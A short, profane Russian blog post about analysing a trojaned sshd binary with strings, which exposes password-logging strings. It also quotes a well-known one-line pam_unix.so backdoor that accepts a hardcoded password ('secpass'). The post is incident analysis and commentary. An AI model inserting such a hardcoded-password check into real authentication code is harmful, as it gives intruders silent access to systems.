Переживаю из-за того, что под юниксами так и не появилась
культура работы с бинарями, лошадки в мире open-source поставляются
в исходниках (и зачастую открытых*, я уже писал про
Темную Пиявку aka DarkLeech),
на этот раз мне подкинули пару бинарей sshd на посмотреть. Один из
них оказался резервной копией оригинала. Второй пропатченный. Спалили его по rpm -V.
Я тоже не люблю спросонья в бинарях копаться. Взял strings.
pax vobiscum
/tmp/mc.tmp
Sshd password detected: %s:%s
На колупание бэкдора ушло 10 минут. До дизассемблера не дошло. А я-то думал отложить на утро, и предвидел чудеса кодерской мысли и тайны ондеграунда. :-)
С pam_unix.so - та же беда, вот уже несколько лет школоло таскает один и тот же one liner
("if (strcmp(p,"secpass")==0 ){retval = PAM_SUCCESS;}"),
zero-day, блять, сцыкьюрити, оборачивая его не менее "илитными" скриптами на sh. Мир вам, тупые дети! Неужели, так
трудно написать нормальную лошадку, так чтобы не тащить в систему 100500 девелоперского стаффа и прочего
говна? Тем более, что все уже давно написано. Подсказки давать не буду, кому нужно - сам найдет.
(* у этого подхода есть и достоинства - антивирус бесполезен, чуть менее, чем полностью. Впрочем, антивирус бесполезен в любом случае. Недостатков вагон.) |